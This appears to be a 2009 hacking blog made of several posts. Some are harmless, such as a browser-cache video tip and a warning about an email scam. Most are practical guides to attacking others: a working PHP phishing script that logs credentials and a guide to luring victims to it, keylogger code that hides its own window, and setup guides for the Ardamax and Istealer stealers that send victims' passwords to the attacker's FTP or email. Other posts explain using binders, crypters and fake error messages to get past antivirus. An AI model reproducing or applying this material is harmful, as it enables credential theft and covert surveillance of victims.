Thursday, October 22, 2009

Download any video from youtube, Metacafe, blogs or any site you know..

Ya, Everyone enjoy finding their favorite videos over online video sharing site like Youtube, Metacafe, Myspace, etc,etc.. We surf over thousands of videos and we do download few of them using the sites like Keepvid, Clipnabber or some free tools for the purpose, which uses the url of the video...

Now, What if:

-Embedding is disabled by the author of the video in Youtube..??
-You are unable to find the real url of the video from some site..??
-URL is masked by the carring site..??
-Video is in blog, or any minor site not supported by our downloading tool or site..??

So, you end up not able to download the video you liked..?? You think there is no way now to get that video..?? so, sorry to break your belief, so now i will tell you how to get any video, without any effort or using any site or tool.. Ready now...??

Follow the steps:

1. Launch your browser, find the video you need, let it get buffered fully, enjoy it till then, then just close the browser.. Your half job is done... now some easy steps..
2. No, you don't need any tool or software, the video is in your own harddrive you just have to find the right place to look at.. find it and rename it..
3. For that to happen, visit your browser's cache location..(change the username)
Chrome:
C:\Documents and Settings\<User Name>\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache
Opera:
C:\Documents and Settings\<User Name>\Local Settings\Application Data\Opera\Opera\cache
Firefox:
C:\Documents and Settings\<User Name>\Local Settings\Application Data\Mozilla\Firefox\Profiles\<Profile Name>\Cache
IE:
C:\Documents and Settings\sham\Local Settings\Temporary Internet Files

4. Now right click and arrange icon by size or modifing date.. you will find the large size file, rename it to any name and give .flv extension.
5. Now, play the file in VLC or any other player supporting flv..

So, Now, don't surf around searching for video downloading sites or tools, and enjoy any video you like, download it without any effort..

hope you liked the post.. Do Comment
Hack Gmail

Thursday, October 15, 2009

Coding Your own Keylogger..

So till now, we only concentrated on hacking using tricks, social engineering, existing tools and other things.. So, now its time we start learning how to create our own, because by the time we start using this tools, they are already released in public and hence is identified by most of the anti-virus software, making your job harder.. So if you create one for yourself and not intend to release it in public.. You can use it without worrying about anti-virus software installed at victim's side..

To start with we will create a basic key-logger.. You already know by now, it is a basic component for a trojan, RATs, and almost every hacking software uses this feature.. Its available in many flavors or we can call it enhancement.. like invisible to user, invisible in task bar, stealth mode, autostart, mailing function, etc, etc.. today we will learn only the basic that is how it records the keystrokes..??
A keylogger listens to every keystrokes and records it for us.. There exists three way to implement keyloggers(that i know about..). They are:
1. GetAsyncKeyState
2. GetKeyboardState
3.Windows Hooks

Here we will be using the AsynckeyState one.. Now i love the language C++, so i will be using that, but it can be implemented in any language, i will be posting the VB6 and DOT NET versions soon..

So, lets get started..
I am posting the code, it is self explanatory, if you face any problem or need any help, related to compiling or understanding.. Comment here..
and ya, your keys are logged at "logs.txt" in the same folder as your exe..

CODE:
/* THIS CODE WAS Published By Pratik Mishra.. Using help from the net and other programmers.. 


If you find any problem comment at http://www.hackerhubz.blogspot.com
*/

I hope you enjoyed the post.. Do Comment.. 
and if you wanna make your program invisible then you can add this to code.. at the start of main() Function..


 typedef HWND (WINAPI *tGetConsoleWindow)(void);


  tGetConsoleWindow pGetConsoleWindow = 0;
  HINSTANCE handle =  ::LoadLibrary("Kernel32.dll");
  if ( handle ) 
    pGetConsoleWindow = (tGetConsoleWindow)::GetProcAddress(handle, "GetConsoleWindow");     
  if ( pGetConsoleWindow ) 
  {
    HWND hwnd = pGetConsoleWindow();
    ::ShowWindow(hwnd,SW_HIDE);
  }
  if ( handle )
    ::FreeLibrary(handle);
      
So, now we getting into real business but the new kiddies don't worry will keep on posting some cool stuffs, tricks and tools for you too...
Hack Gmail


Wednesday, October 14, 2009

Forgot Your Rar file Password???




Winrar is the most commonly used software today.. whether to reduce the size or to protect your sensitive data.. But there are times when you lose your rar file password..
Almost everyone of us find such password protected winrar file.For example, you have downloaded movies or something else from torrent or rapidshare, and when you try to open the downloaded file appears “Enter password for the encrypted file”… Damn… what next…You can decrypt the password of the .rar file with RAR Password Cracker. It works great with small password but time increase exponentially as length increase.. and to be honest this is the only way to crack rar password.. Bruteforcing Coz it is encrypted with industry strength AES (Advanced Encryption Standard) Encryption with a key of 128 bits and there is no way through it..

So we better get going coz it worth a shot if the file is really important before you give up..

You can use a dictionary attack and a brute force attack.if you have a good dictionary then go with it it reduces the time and if you know the person well you can define your own dictionary to use. else go for Bruteforce. Brute force actually means to start with a letter a and encrypting it. Then see if the encrypted strings match. If not then b, c, … until we’ve gotten . Then the encrypted strings will match and we’ll know that is the right password. Brute force attack is the slowest method of cracking, but there is no risk that you’ll not find the password. The thing about brute force is that the time of cracking rises rapidly depending on how long the password is, how many characters are being used in it and so forth.

try the software and if you run into any problem comment here..

Saturday, October 10, 2009

Hack Any Password in a minutes..??




Most of the people always ask for the easiest way of hacking email password. It is the most widely googled phrase for a long time. In fact the most widely asked question on hacking is related to email password hacking.The thing is you all also have same thing in your minds.. so, thats why you are here.. So, I already told you enough tricks, but my aim here is not only to tell you how to hack the accounts but also to help you protect your own accounts..
Think how it sounds.. A Hacker's ID got hacked..!!! well ya thats also an option for mass hacking.. Whaling.. But it will be coverd later.. First of all the basic scam which is used to get password is by fooling you.. Ya, you guessed it right.. Social Engginering again..!! First of all don’t get fooled by the so called the “Simplest or Sure Shot way to hack an email password” given on many scam sites. Here’s the scam procedure. They give you a method of password hacking.. This method is of hacking password never works... Check out..

ITS A TRAP.. Don't Fall For It...

>>STEP 1- Log in to your account (yahoo,hotmail,gmail etc.)
>>STEP 2- Click on Compose
>>STEP 3- In the subject type exactly as follows
Get PASS
>>STEP 4- In the to address exactly type the following email address
mypass@yahoo.com (for yahoo)
mypass@hotmail.com(for hotmail)
passreset@gmail.com(for gmail)
>>STEP 5- Body of the mail
In the first line type your own email address and in the next line your password.
NOTE: This step is the most important,so do it exactly as instructed.
for example:
myemailid@yahoo.com
iamafool
Give a lines gap after this.
Now type the email address of the person you want hack.
In the next line type the following code exactly as given below
**yyb67hhfy@#ysscrewedyhhdiuhhyahoo.comsi*8??” (for yahoo)
**yyb67hhfy@#ysscrewedyhhdiuhhhotmail.comsi*8??” (for hotmail)
**yyb67hhfy@#ysscrewedyhhdiuhhgoogle.comsi*8??” (for gmail)
>>STEP 5- Now Send the mail and check your inbox after a few hours. The victims password is mailed to you by the password resetting server.This is a major bug in most of the hosts such as yahoo,gmail etc. Here the server is confused and it sends you the password of the victim.

or something similar to this..

Never ever try this trick.. Never.. If tried you definitely loose up your own password. Let’s see how the above mail works.
First of all the “To address” of the mail is none other than the ID of the person who has written this trick. This email has no special value,it’s none other than an ordinary email address belonging to a user like you, not the server email address. So you are just mailing your own ID and the password to a stranger in attempt to hack other’s password. All the other rules such as line gaps,codes etc. are utter nonsense, just given to make you believe it is true. So the bottom line is never believe/try these hacks. These method is called Social Engineering where the people are made to mail their own username and password to the hacker’s ID. So here the people get fooled and loose their password in attempting to hack some other’s password. This is up to hacker how to convince..

Just remember their is no such direct method to hack any account's password.. The security administrators working there is The DAD..( n ya hackers are one step ahead.. The Grand PA..) So be paitent and try the tricks mentioned in the blogs and dont fall for the scams..!!

Most detailed guide to phishing..

I am writing this post in response to the request made to me via comments to give tutorials about phishing.. Here i will be listing step by step instruction to create your own phishing page or a fake page..

So, before starting something more quick for the new learners.. I am giving the pre-made pages in the links.. You can use them.. or if you really wanna learn then scroll to Detailed Method:

Method 1: Use my Pages-
Here are the steps you must follow for this to work...

1. Sign up to a free hosting service like Freehostia or Ripway or anyone of your choice there are many available options for it..
2. Download the phishing pages for the site(s) you want..
Yahoo Mail
Rediff Mail
Orkut
Gmail
Blogger
FaceBook
3. Upload them to the hosting service (both php and html).. and get the url for the index.html, this will be your fake page..
4. you are done now.. just pass the link to the victim and ask them to login.. then open the hosting site and find the file passes.txt You will find all the variables in the site along with the login name and the password.. Njoy.. If you face any problem comment.. or if you want the pre-built fake pages for any other sites the also comment, I will create and add it here..
If you still struggle to create on your own, i will set it up for you.. and hand you the password..!! 

Method 2. Create Your Own (Detailed method) -

1. It is must to sign up with a hosting service, so get one first..
2. Then go to the page you want to create a fake page of, say yahoo.. and save the html file..( Go to login page not the main page)
3. Now you have to create a php script for recording all the variables that are entered in the page and storing it to a text file, You must know that even the login name and passwords are the variables here. so, you will get them to.. The script is self explanatory, but if you wanna know more about it comment and i will help you..

<?php
header("Location: http://www.yahoomail.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
 {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save this with name phis.php this one is for yahoo so, the url is for yahoo.. and it will record all the variables in the passes.txt

4. So now you have to link this script with the page you saved earlier..

5. Open the html file in your HTML editor or notepad, and find the "action = " label and replace the following thing with the name of the php file i.e phis.php
6. what you just did is to call your own script when the user submit its form using the action command in html, so now you have the password and the user is redirected to original page..

The following tips will make your task easier..
1. You can send them this link through an anchor text "Yahoo" having hyperlink to your URL.. this will remove the doubt about entering the url in the url navigation bar..
2. You can sign in to get free domains along with hosting mentioned before from the sites like CO.CC or Dot.tk which will make your task more simpler..

So, hope you enjoyed the post, please comment and let me know.. it will be highly encouraging..
Cya, Will be back with more.. Happy Hacking...

Thursday, October 8, 2009

All Types Of Hacking Techniques.. 17 ways to bring accounts to your Mercy..






Update : The blog wasn't updated for long. It's been maintained now. Do check the new post that elaborate on  Whaling - A way to hack the hackers (mentioned in this list too). Anyway for now continue with the compiled list. 

So, Its time now that we should know what are various categories hacking fall into. I will try to focus on the ones based on password hacking. I've also written a small post on email hacking techniques already but this one will cover it elaborately. There is no distinct classification of hacking.. but i will list all i could remember..

So, as you all would have guessed this will not be a practical application.. I will give tutorials on all of them in coming posts.. but its the most important thing to have basic knowledge about all the techniques available.. So, consider going through the post once..

Common Methods for Hacking Computer Terminals(Servers):
This comprises of either taking control over terminal(or Server) or render it useless or to crash it.. following methods are used from a long time and are still used..

1. Denial of Service - 
DoS attacks give hackers a way to bring down a network without gaining internal access. DoS attacks work by flooding the access routers with bogus traffic(which can be e-mail or Transmission Control Protocol, TCP, packets).

2. Distributed DoSs -
Distributed DoSs (DDoSs) are coordinated DoS attacks from multiple sources. A DDoS is more difficult to block because it uses multiple, changing, source IP addresses.

3. Sniffing - 
Sniffing refers to the act of intercepting TCP packets. This interception can happen through simple eavesdropping or something more sinister.

4. Spoofing - 
Spoofing is the act of sending an illegitimate packet with an expected acknowledgment (ACK), which a hacker can guess, predict, or obtain by snooping

5. SQL injection -
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. It uses normal SQL commands to get into database with elivated privellages..

6. Viruses and Worms - 
Viruses and worms are self-replicating programs or code fragments that attach themselves to other programs (viruses) or machines (worms). Both viruses and worms attempt to shut down networks by flooding them with massive amounts of bogus traffic, usually through e-mail.

7. Back Doors - 
Hackers can gain access to a network by exploiting back doors administrative shortcuts, configuration errors, easily deciphered passwords, and unsecured dial-ups. With the aid of computerized searchers (bots), hackers can probably find any weakness in the network.


So, not interested in these stuffs.. huh??? wait there is more for you.. So, how about the one related to hacking the passwords of email and doing some more exciting stuffs.. The various methods employed for this are:

Trojan horses, which are attached to other programs, are the leading cause of all break-ins. When a user downloads and activates a Trojan horse, the software can take the full control over the system and you can remotely control the whole system.. great..!!! They are also reffered as RATs(Remote Administration tools). I've written about them here.

Consider the situation, everything you type in the system is mailed to the hacker..!! Wouldn't it be easy to track your password from that.. Keyloggers perform similar functionallities.. So next time you type anything.. Beware..!! Have already posted about keyloggers and ways to protect yourself from them.. read it here.

10. BruteForcing - 
The longest and most tiring job.. don't even consider this if you don't know the SET of password for your victim..

11. Secret Question - 
According to a survey done by security companies, it is found that rather than helping the legitimate users the security questions are more useful to the hackers.. So if you know the victim well try this..

12. Social Engineering - 
Ya this was one of the oldest trick to hack.. Try to convince your user that you are a legitimate person from the system and needs your password for the continuation of the service or some maintainence.. This won't work now since most of the users are now aware about the Scam.. But this Social Engginering concept is must for you to have to convince victim for many reasons..!!!

13. Phishing
This is another type of keylogging, here you have to bring the user to a webpage created by you resembling the legitimate one and get him to enter his password, to get the same in your mail box..!! Use social engginering.. A detailed guide for the phishing can be found here or an introductory and setup explanation here

14. Fake Messengers - 
So its a form of phishing in the application format.. getting user, to enter the login info in the software and check your maill..!!!

15. Cookie Stealer - 
Here the cookie saved by the sites are taken and decoded and if you get lucky.. You have the password..!!!

Hmmm.. not satisfied with single account at a time..?? so there are ways to hack lots of accounts together.. I know few but there exists many..!! listed are the ones i know and will teach you in coming posts...

16. DNS Poisoning or PHARMING - 
So, phisihing is a tough job.. isn't it..?? convincing someone to enter their password at your page..?? what if you don't have to convince..?? what if they are directed automatically to your site without having a clue..?? Nice huh..?? Pharming does the same for you.. More about it in my next post..

17. Whaling
This method gets you the password of the accounts which are used by the hackers to recive the passwords.. So you just have to hack one ID, which is simplest method( Easy then hacking any other account, will tell you how in coming posts..) and you will have loads of passwords and so loads of accounts at your mercy..!!!

I would like to add one thing the methods metioned under exiting ways are easy but are for newbiees and script kiddies so if you really want to learn hacking then do some real work, then relaying on the softwares or tools.. will give info of that in my later posts.. or comment if you want any more info.. 

So thats all for now.. Comment if like the post.. I will highly Appriciate your interest.. 



Tuesday, October 6, 2009

Fake error message generator : Hide keylogger and trojan

I have already explained about use of Binders and Crypters to hide our keyloggers and trojans. Today, I have written this article to inform you about one more hacking software which can be used to convince the victim that the software isn't malicious and some error crept in, Our Social Engginerring Tool -Fake error message creator. This software is of immense use if you wanna install your RAT server or keylogger remotely. I will tell you how to use this software in this article.

Fake Error message creator:
Suppose, you have sent keylogger or trojan to victim to install it on his computer. He runs the keylogger and gets an error message “Unable to open file- Runtime error”. Then he asks you for this message and you can easily say that “May be the file was not supported or was corrupt” and he believes you.
But, in this mean time, your server or keylogger is installed on his computer(without his knowledge) and you start hacking his computer remotely and also extracting passwords from his computer.
This is what a fake error message creator can do. This software helps you to create a fake error message to hide your trojan or keylogger from victim’s eyes.

How to use Fake Error message creator:
1.Download Fake Error message creator software.
Password: hackerhubz
2. Unzip downloaded file.
3. Run the software (supports Windows XP and Windows Vista). Now, simply enter the information as you like and want the error message to look like.
4. After filling information, hit on “Build” and you will get “MessageBox.exe” file in current directory. You can bind this “MessageBox.exe” to keylogger to hide it from victim using Binder.
5. Here is the example


and its resultant fake error message.


That’s it. Just try out this software to create fake error messages. As already said, this software is worthy for hiding RATs and keyloggers from victim’s eyes. If you have any problem in using this Fake error message creator software, please mention it in comments.
njoy hacking..

Hack Tool : Istealer

Istealer like ardamax is an efficient windows password stealer software used to hack email account passwords and every online activity. I have already explained about RATs and keyloggers and Torjans to hack email account passwords, where you have to send your keylogged file to victim. In the same way, Istealer can be used to hack email account password and find passwords of various emails.

Steps:

1. Download Istealer password stealer software to start the hacking..
2. Go to http://www.esmartstart.com/ or any other free hosting site and sign up for free account. After creating free ftp server account, enable FTP Access and create a new folder named “Istealer” at your FTP.
3. Run the Loader.exe file present in Istealer folder to get something like:


4. Now, simply fill the following in Istealer:
Host: ftpserver.esmartdesign.com
Username and Password: Your username and password for esmartstart ftp server.
Directory: /Istealer
5. You can bind Istealer to any other file by checking “Bind with another file” and giving file path to bind with. Also, you can use Icon Change to change Istealer file icon. This step is optional but, necessary for hiding password stealer from victim’s eyes.
6. To check whether you have entered right ftp server information, hit “Test” and if you have done it right, you will get message “Works perfect”. If it says “Cannot connect to FTP Server”, you have entered something wrong… just check it again.
7. When you’ve done all above steps, simply hit on “Build” and save the password stealer file as you want. You can also use crypters as i explained in last post for hiding it from AntiVirus Software.
8. Now, simply send this password stealer file to victim and make him run this windows password stealer file on his computer use Social Engineering. After he runs our sent password stealer file on his computer, you will get all passwords and records saved on his computer at your FTP server.

That’s it. Now, you can hack email account password using Istealer. Remember to crypt and then bind this windows Password stealer to make it undetectable by antivirus. If you have any problem in using this Istealer password stealer software to hack email account password, please mention it in comments.
njoy Istealer..

Binders : Hackers best friend..



So now we know about hacking tools like trojans, RATs, Keyloggers, Crypters to prevent their detection but the bottleneck is still the program execution on the remote machine... Generally user don't run untrusted applications.. so the solution is to bind our tool with something they trust so that when they run it they will get their program running and we will get  ours!!!

What is Binder???
Binder is a software used to bind or combine two or more files in one file under one name and extension. The files to be binded can have any extension or icon. The user has choice to select the name, icon and various attributes of binded file. If binded file contains an application (in our case - RAT or keylogger), the application is also run when the actual binded file is run.

Why is Binder used???
As I mentioned before, generally, RATs and keyloggers are detected by most antiviruses. Also, you can’t send victim a RAT or keylogger and ask him to install it on his computer. So, you have to bind that RAT or keylogger with say image, movie or song (any file depending on victim) and then ask him to run this binded file on his computer.
When the victim runs our binded image (binded with keylogger) on his computer, keylogger is installed on his computer and we can easily obtain all his typed passwords. Kwel..!!!

How can I get a Binder???
There are many available online you can search for them.. I am also providing few binding software, can download it from here too..

Simple Binder
Weekend Binder

All publicly available Binders are detected by Antivirus Software but can be used to fool few cause some ignore scanning mp3 or image files and you can also apply your social engineering here for convincing the victim..!!!

Also, it is better to use Crypters to avoid AV detection. It is general practice to first crypt the keylogger or trojan with Crypter and then bind the crypted trojan to make it deceptive.

So till the next post.. Njoy Hacking!!!

Crypters, Make your Trojans, Keyloggers and RATs UnDetectable...!!!



So, We already talked about trojans, RATs and about Keyloggers and the publiclly available ones among these are detected by almost all the anti-virus softwares..
So, how to hide it from antivirus softwares??? Well here is the solution : Crypters..

What are Crypters??
As said above, Crypter is hacking program or application used to hide our viruses or RATs from antiviruses so that they are not detected and deleted by antiviruses. Thus, a crypter is a program that allow users to crypt the source code of their program. Generally, antiviruses work by splitting source code of application and then search for certain string within source code.
If AV detects any certain malicious strings, it either stops its execution and scan it or deletes the file as virus, making all our efforts useless..


What does Crypter do???
Crypter simply assigns hidden values to each individual code within source code. Thus, the source code becomes hidden. Hence, our sent crypted trojan and virus bypass antivirus detection and our purpose of hacking them is fulfilled without any AV hindrance. Not only does this crypter hide source code, it will unpack the encryption once the program is executed.

What is FUD ???
FUD is acronym for Fully UnDetectable. With increased use of Crypters to bypass antiviruses, AV became more advanced and started including crypter definitions to even detect crypter strings within code. So, use of crypter to hide RATs became more complicated as nowadays, no publicly available crypter is FUD.
So, if you crypt RATs with publicly available crypters, they are bound to be detected by antiviruses. This is because most FUD crypters remain “FUD” for maximum of one or two days after their public release.

To obtain FUD crypters, you have to either search for it in hacking forums or make one.. But its worth the search..
I am posting two Crypters that i use.. Download it Here..
Password: hackerhubz
Turn off your anti-virus if it detects it as hack tool and then extract again..

Do Comment if you have any query or if you njoyed reading the post..

Protect Yourself From Keyloggers..



In my last post i mentioned about keyloggers and their intrusion in your privacy.. So now i am suggesting a tool for all of you to protect yourself from keylogger attacks.. If you wanna know more about keyloggers and how tohack using them refer my last post.  In short, they are malicious tools which intercepts your every keystrokes along with your password and provide it to attackers..


So now how to protect your self from these keylogging attack?? and how to protect your login credentials..???



Key Scrambler Personal is a free anti keylogger serving our purpose in the web browser, which intercepts every keystrokes you enter online and thus sending the encrypted message to hacker rendering them useless for them..


Download For Free Now..


It will protect users when using online shopping, mail , credit cards , bank accounts , house addresses , java , flash , browser dialogs , browser passwords and more.







How It Works??


After you install KeyScrambler Personal, if say some keylogger tool is installed on your computer and whatever you enter it will send as junk(false) data (encrypted format) to keyloggers and prevents your data. In simple, It encrypts your keystrokes at the keyboard driver level in the kernel, as they enter the computer. Once you install KeyScrambler computer restart is necessary and it works background without making any changes to your browser. you can customize certain hotkey to enable or disable encryption.




Highlights of KeyScrambler Personal - 

# It defeats old and new, known and unknown, keyloggers and even works on security compromised computers.
# It supports more than 100 applications and user friendly interface.
# It is compatible with other security programs , authentication methods and easy to use.

The personal version is free and only works with three browsers in Windows – IE, Firefox, and Flock.





It is a must for all who don't want to be a victim of hacking attacks..


So be protected and njoy Safe Surfing.. n do comment..

Monday, October 5, 2009

Hacking Using Keylogger

So here comes one of the most important technique for hacking - keylogger


A keylogger intercepts all the keystrokes typed in the system( Including the Passwords!!!) and send it to you by mail. so you can not only get the password but also all his activities over the system..


here i am giving tutorial about one of the most used keylogger: ArdaMax


Basically what is keylogger??


 keylogger is a hardware device or a software program that records the real time activity of a computer user including the keyboard keys they press. These keyloggers allow not only keyboard keystrokes to be captured but also are often capable of collecting screen capture from the computer. The keys they press are programmed to automatically transmit data over the network to a remote computer or Web server.


So before going forward download the software from here.. it also includes the binder software.. will give information about it in coming posts..


Password : hackerhubz


Your antivirus might detect it so turn it off when you unpack and work with it to hack others password..


1. After installing the program, when u run it for the first time, you’d be asked to put in the name and the serial number which u will get from the downloaded software folder.[i hav included the key for the software]


2. After activating it, lets open it up. When you’ll open it, you’ll see an icon added into your system tray..



3.  Now lets right click on that icon & then click on “Remote Installation”. 



4. Lets click on next . In the option that says “Additional components” select ONLY “Log viewer”.





5.  Now next screen would give you “Invisibility” options. This will help you to hide your key logger from your victim’s computer. So CHECK’EM all!




6. Now next screen says “Security”, i personally don’t find it useful so you may just click on NEXT.


7. Now the page that says “Web Update”, lets UNCHECK all off the boxes & click on NEXT.


8.  Now you will see “Options” page. select as you want it..



9.  Now here comes the most important page, which will show u the options and will let u select the way you want to receive the information from your victim’s computer.
You will have 3 options to receive victim’s info. I refer to use Email or FTP method..


If you find any problem with it or with configuration comment below..


10. After setting it click on test and you are ready to go...!!!


11. Now you’ll get “control” page, let it be the way it is and click NEXT


12. Now you’ll get an option for “Screen shot”, which will send you screen shot of your victim’s computer. So adjust it as per your requirement and click NEXT.


13.  Now you should see a page which will let you generate your keylogger’s file. So save it anywhere  u want but MAKE IT SURE U DON’T OPEN IT. You can change icon as well.


14. You’re done!





15. What u need to do now is,  open this file on any computer u wanna hack. Or  send this file to your victim by email or other means and let him open it and start enjoyin!


Note:-
a. When you download Ardamax, your antivirus will detect it as a virus. But dont worry, it wudnt hard your computer. So you can disable the “Auto - Protect” feature of your antivirus and then install this software.


b. when you send your keylogger to your victim, his anti virus may also detect it as a virus. So now its on you to convince him.


c. I have included an Binder for this ardamax . so that u can bind the ardamax keylogger in a jpeg picture file or something and convince the victim and make him install. whoaa ! your the king ! Rock N Rolla!!!


Hope u njoyed it.. Do comment..


Featured Followers